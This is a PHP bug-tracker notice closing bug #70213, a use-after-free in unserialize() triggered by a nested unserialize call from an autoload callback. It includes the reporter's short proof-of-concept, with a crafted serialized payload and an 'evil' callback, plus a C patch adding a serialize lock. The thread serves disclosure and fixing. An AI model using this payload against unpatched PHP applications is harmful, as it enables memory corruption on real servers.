Bug #70213 [Opn->Csd]: Unserialize context shared on double class lookup

From: Date: Sun, 01 Jan 2017 13:14:36 +0000
Subject: Bug #70213 [Opn->Csd]: Unserialize context shared on double class lookup
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-206281@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=70213&edit=1 ID: 70213 Updated by: nikic@php.net Reported by: taoguangchen at icloud dot com Summary: Unserialize context shared on double class lookup -Status: Open +Status: Closed Type: Bug Package: *General Issues Operating System: * PHP Version: 5.4.44 Block user comment: N Private report: N New Comment: Automatic comment on behalf of nikic Revision: http://git.php.net/?p=php-src.git;a=commit;h=a65ad951ad95944e357703caa2001f06a4225bf6 Log: FIx bug #70213 Previous Comments: ------------------------------------------------------------------------ [2017-01-01 13:08:07] nikic@php.net Looks like the use-after-free has already been otherwise resolved in the meantime. However, we should of course still lock the context here. ------------------------------------------------------------------------ [2015-12-08 22:26:17] yohgaki@php.net @stas It seems proposed patch is applicable to 5.6/7.0. Are you going to merge the patch or it's not needed for 5.6/7.0? ------------------------------------------------------------------------ [2015-08-16 22:44:38] stas@php.net This exploit seems to require specially crafted code unlikely to be encountered in real applications. As such, doesn't look like a security issue. ------------------------------------------------------------------------ [2015-08-08 10:56:11] taoguangchen at icloud dot com previous PoC is work but some code is not required, so i update a new PoC: ``` ini_set('unserialize_callback_func', 'evil'); function evil() { function __autoload($arg) { $str = 'a:1:{i:0;i:1'; unserialize($str); } } $exploit = 'a:2:{i:0;O:4:"evil":0:{}i:1;R:4;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data); ``` ------------------------------------------------------------------------ [2015-08-08 10:24:20] taoguangchen at icloud dot com the patch for 5.4 series (maybe work on 5.5 and 5.6 series): diff --git a/php-5.4.44/var_unserializer.c b/php-5.4.44-fixed/var_unserializer.c index 8c4e629..bb35ba8 100644 --- a/php-5.4.43/var_unserializer.c +++ b/php-5.4.43-fixed/var_unserializer.c @@ -728,6 +728,7 @@ yy20: } /* The callback function may have defined the class */ + BG(serialize_lock)++; if (zend_lookup_class(class_name, len2, &pce TSRMLS_CC) == SUCCESS) { ce = *pce; } else { @@ -735,6 +736,7 @@ yy20: incomplete_class = 1; ce = PHP_IC_ENTRY; } + BG(serialize_lock)--; zval_ptr_dtor(&user_func); zval_ptr_dtor(&arg_func_name); ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at https://bugs.php.net/bug.php?id=70213 -- Edit this bug report at https://bugs.php.net/bug.php?id=70213&edit=1

« previous php.bugs (#206281) next »